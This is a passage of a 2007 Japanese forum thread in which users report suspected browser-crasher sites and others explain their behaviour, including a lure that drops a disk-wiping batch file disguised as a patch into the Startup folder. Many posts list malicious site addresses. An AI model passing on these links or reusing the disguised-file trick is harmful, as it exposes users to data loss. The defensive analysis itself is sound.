新規メール作りまくった(送信はしてない?)
とっさにネットワーク切ったが。。。

どなたかボスケテください(T_T)
959名無しさん@お腹いっぱい。:2007/12/09(日) 23:24:44
tp://www.fuckin-star.com/
アダルトサンプル動画サイト
(サイトの性質上、トップページのアドレスだけ書きます)
奥に進んでzipで動画を置いてるページに行くと
大量の掲示板書き込み試行の後が、ブラウザ履歴に残ります
>>957のブラクラチェッカーではほぼ安全判定
javaスクリプト切ると問題無し?よくわかりません

Mac OSX 10.3.9、Safari
960名無しさん@お腹いっぱい。:2007/12/10(月) 00:41:48
961名無しさん@お腹いっぱい。:2007/12/10(月) 13:44:28
>>960の兄貴へ
自分のオツムでは無理です
名前ではじいちゃってもよかですか?
962名無しさん@お腹いっぱい。:2007/12/10(月) 18:18:12
>>954,958,960
踏むと転送サイト(snipr.com)を経由して、結局同じ所に飛ばされるね

1.flvっぽい画像を表示
ttp://cunt.multiservers.com/media/viewvideo.gif

2.釣られてページ内でボタンを押すとアラート表示
ttp://up2.viploader.net/pic2/src/viploaderf120002.jpg
OK後、グロ画像炸裂、効果音はrmメディアなんで再生できなかった

3.グロ画像で参っている合間に、こんな内容のメールを作成
ttp://up2.viploader.net/pic2/src/viploaderf120000.jpg
日本人嫌いなんですかね

4.グロページから逃げようとすると、アラート表示
ttp://up2.viploader.net/pic2/src/viploaderf119999.jpg
騙されそうになった

5.その後、バッチファイルをダウンロードを促される
ttp://up2.viploader.net/pic2/src/viploaderf120001.jpg
いきなりスタートアップフォルダ指定ですか

ちなみにバッチファイルは実行するとHDDが全部まっさらになる
963名無しさん@お腹いっぱい。:2007/12/10(月) 18:23:12
>>958
送信まではしてない模様

>>961
NG指定でもいいけど、また別のjpg偽装されたらいたちごっこかもしれんね
HOSTファイルいじってsnipr.comかcunt.multiservers.com(ブラクラ置き場所)
を無効にするか、それかjava切るか、IEやめるかとか
964961:2007/12/10(月) 18:46:53
うん、始めサーバ込みではじこうかと思ったけどやっぱそうしてた
そこドメインも利用者もわけありっぽいよね
965名無しさん@お腹いっぱい。:2007/12/10(月) 19:42:57
serversだけじゃなくてsiteもあるね
cunt.multiserversは見つからない
966954:2007/12/10(月) 19:49:52
>>962
詳しい鑑定ありがとうございます。
自分は3番(Outlook起動、メール作成ウインドウが次々開いていく)の時点で
強制的にPCの電源を切りました(電源ボタンの長押し)。
今のところHDDのデータなども異常はないみたいです。
これでもう大丈夫でしょうか?
967名無しさん@お腹いっぱい。:2007/12/10(月) 20:08:39
>>966
破滅への道筋は

1.アラートにだまされてbatファイルを保存
2.保存を選んでも保存ダイアログがまた出るので、我慢できずリセット再起動
(グロと効果音がうるさくて正常な思考を妨げられています)
3.スタートアップに保存されている事に気付かず、OS起動と同時にHDD消去開始

なので、batファイル(極窓ではhtmファイル扱い)をダウンロードさえしていなければ
特に問題無いはず。データも大丈夫だろう

一応>>962の1.までなら普通にページ閉じて脱出
2.以降はタスクマネージャから終了で抜けられる


気になるのは2日くらい前の鑑定結果と内容に違いが出ている事
ブラクラhtmの更新日時が最近なので=今も内容を更新中らしい
またあの手この手で拡散するかも知れない
968954:2007/12/10(月) 22:46:56
>>967
レスありがとうございます。
batファイルのダウンロードは行っていないと思います。
今のところ特に問題は無いようなので、しばらくPCの様子を見てみます。
鑑定結果が少し気にはなりますが、これ以上拡散されないことを願います。
969954:2007/12/10(月) 22:55:41
>>967
すみません、もう一つだけ質問させてください。
もし自分の気付かないうちにbatファイルをダウンロードしてしまっていた場合、
自分のPCの中からそれを探し当てることや、削除することは可能でしょうか?
970名無しさん@お腹いっぱい。:2007/12/11(火) 14:29:45
>>960
jane.tmpが飛び先の記述で汚染されているのに気づいたw
971名無しさん@お腹いっぱい。:2007/12/11(火) 14:32:10
>>969
batファイルが実行される前なら可能

OSがXPで、保存先を特に変更していないなら
保存先:C:\Documents and Settings\ユーザー名(もしかしたらAll Users)\スタート メニュー\プログラム
ファイル名:MS_Patch.txt .bat
になる
後はフォルダから取り出すなりファイル名でドライブ検索すればいい、が

こうして無事に書き込みしている事そのものが、ファイルのダウンロード及び
実行もしていない事の証左なので、心配する事も無い
batファイルは恐らく実行時に自身を消去するよう書かれてる
それ以前に実行されたらOSが無事では済まないと思うが

また、件のブラクラページはもう撤去されて、新たに作られたページ
(踏んでないけど100%悪意のあるページだろう)に飛ぶ
972名無しさん@お腹いっぱい。:2007/12/11(火) 15:17:28
こういうのって2chブラウザをオミトロン越しにするしかないのかな
973954:2007/12/11(火) 22:03:37
>>971
丁寧なレスありがとうございます。
一応ドライブ検索してみましたが、該当するファイルはありませんでした。
ブラクラの進化は早いんですね。今後も気をつけます。
鑑定していただいて本当に安心しました。ありがとうございました。
974958:2007/12/12(水) 00:10:49
>>962 >>963
回答ありがとうございます!!

今のところ、迷惑メールも来ることなく
PCも正常に動作してます。

今後とも気をつけますです。。。
975名無しさん@お腹いっぱい。:2007/12/12(水) 00:28:47
>>974
その気持ちを、いつまでも忘れないでください。
976名無しさん@お腹いっぱい。:2007/12/13(木) 21:56:37
//1st.geocities.jp/mimigeruhakaseblog/
おねがいします
977名無しさん@お腹いっぱい。:2007/12/13(木) 23:20:01
ここは鑑定スレじゃねぇ

ブラクラかもしれなくて踏めない人たち その20
http://pc11.2ch.net/test/read.cgi/pcqa/1192793132/
978名無しさん@お腹いっぱい。:2007/12/14(金) 11:10:40
すいません、私もこれを踏んでしまったのですが
mantoruhakase-blog.bravehost.com/

良く分からないブログの名前が出て、
Trojan.ByteVerify を読み込んでしまい、ビープ音とともに
タグが消える挙動をしました。

すぐに電源を落として、ネットに繋がずスキャンしたら、
上記のウィルスが発見されて削除されましたが
これで安全でしょうか?
979名無しさん@お腹いっぱい。:2007/12/15(土) 00:05:47
>>978
Trojan.ByteVerifyは、2003年のMSJavaVMのセキュリティホールなので、今は検出はされても実行はされない。
980名無しさん@お腹いっぱい。:2007/12/15(土) 09:01:56
久しぶりに利用させてもらいます。
お世話になります。
↓踏んでしまったんですが、どのような対応(削除)をすればよいでしょうか?

ttp://ictlab.tyict.vtc.edu.hk/~040386491/up/src/026.jpg

色々開きまくられたんです。
助けてください。
よろしくお願い致します。
981名無しさん@お腹いっぱい。:2007/12/15(土) 13:27:55
   /ヽ /ヽ
  ':' ゙''"  `':, 
  ミ   ・ω・ ;,
 :; . っ     ,つ
  `:;      ,;'
   `( /'"`∪
982名無しさん@お腹いっぱい。:2007/12/15(土) 16:14:01
>>980
詳しく見てないが>>954,958,960のURL違い
>>962以降を参照しておくれ

踏んだ瞬間に発動してそれっきりのものなので
脱出できたのなら特にやる事は無いはず

書いてある事とあまりにも違う現象・症状だったら
内容を変更したのかも知れないので、言って下さい

983名無しさん@お腹いっぱい。:2007/12/15(土) 16:22:43
それとカスペルスキーが検出対応してるんで
入れてる人はサイト転送の段階で防げるかもしれません

宣伝というわけでも無いんですが
カスペはここら辺の検体提出・対応は割と融通の利く所らしく
もしこういう類の罠や引っ掛けがこの先心配なら、導入を検討されてみては
984名無しさん@お腹いっぱい。:2007/12/15(土) 18:10:57
根本的にIEの動作を何とかしないと解決にならないね
一応、設定を一箇所変えれば画像に見せかけたタイプはやり過ごせるけど、まともに
動かなくなるサイトもあるかもしれない
まあ、MSが糞ってことでw
だって、Mozilla.orgやOpera Softwareのブラウザはこんなものには引っかからないんだものw
これではMSが糞としか言いようが無い
985980:2007/12/16(日) 08:54:27
>>982
ありがとうございます。980です。
踏んだ後、962にあるのがすべて表示されました。
違う点があるんですが、その中でも気になるのは、
コマンド プロンプトが表示されました。
わずかな間だったので、何か入力されたのか変更されたのかは、
確認できませんでした。

あと、Yahoo!メッセンジャーを起動させられました。
IDやパスを入力していなかったので、ログインさせられる事はありませんでした。

対処方法としてした事は、一つずつ閉じていって、一番最初に開いた分と
バッチファイルをダウンロードするのを拒否して閉じると、
また最初から同じ事をやりはじめるので、そのままOSを終了させました。
しばらくしてから起動後、スパムとウィルスチェックソフトを動かしました。
危険なものは、何も引っ掛かりませんでした。

今回のはこれで何とかなりましたが、
F4キーで閉じれるものは閉じてそれでも開き続ける場合、
強制終了した方がいいと思います。最終手段ですが。
無限スクリプトのようにメールの作成とか、開き続けられると
PCがいってしまう事があります。

それで昔、購入3日ほどのダイナブックを壊されてしまいました。
販売店に泣きついたら、一つ上の上位機種にしてもらえましたが、
精神的なダメージやストレスはそうとうのものがありました。
参考までに長文スマソ。
986名無しさん@お腹いっぱい。:2007/12/16(日) 22:40:06
コマンドプロンプトは多分telnetかな
最近のPCなら特に意味を成さないだろう

サイトの目的はHDD抹消を含めた嫌がらせなので
最終的にはとにかくbatファイルを落としたまま
再起動をしない事ができていればいい


また飛び先変えてるのな
いい加減きりが無い
987名無しさん@お腹いっぱい。:2007/12/18(火) 21:51:08
すいません。ニュース板でこれを踏んでしまいました。
tp://1st.geocities.jp/mimigeruhakaseblog/

VBの警告メッセージが複数出て、削除方法を見る前に慌てて閉じてしまいました。
その後でVBのウィルス検索をしてみましたが、ウィルスは検索されず、いくつか
スパイウェアが引っかかりました。(削除済み)
IEの一時ファイルは削除済みです。
他に何かすべきことはあるでしょうか? すいません、助言お願いします。
988名無しさん@お腹いっぱい。:2007/12/18(火) 22:10:17
ttp://uproda.2ch-library.com/src/lib001618.jpg.shtml
ν速で踏みました・・。
脱出できましたが、感染とかはないんでしょうか?
989名無しさん@お腹いっぱい。:2007/12/18(火) 23:44:11
>>987
それで終わり。他にはない。

>>988
普通にブラクラ。ウイルスはない。
990987:2007/12/19(水) 01:29:16
>>989
ありがとうございます。
今後は注意します。
991名無しさん@お腹いっぱい。:2007/12/19(水) 02:21:07
http://gopogle.com/
踏んでしまいました・・・・
スパイウェアが仕込まれるという事ですが、
スキャンしてもなにもかかりません・・・

どこから調べればよいのでしょうか?
992名無しさん@お腹いっぱい。:2007/12/19(水) 06:00:49
ttp://www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg
怪しげな画像ファイル踏んでしまいました・・・
一応踏んだ後すぐ消したんですが大丈夫でしょうか?
993名無しさん@お腹いっぱい。:2007/12/19(水) 08:06:27
>>991
踏んだけど何もなかった。

>>992
12000×6927の画像
メモリ少ないとハングするかも
994名無しさん@お腹いっぱい。:2007/12/19(水) 12:25:33
>>993
ありがとうございました。今後は気を付けます
995名無しさん@お腹いっぱい。
tp://topicscollector.blog55.fc2.com/?mode=m&no=2697

一見普通のゲーム動画に見えたのですが、クリックしたところ無限ポップアップに遭いました。
危険性の無いものでしょうか?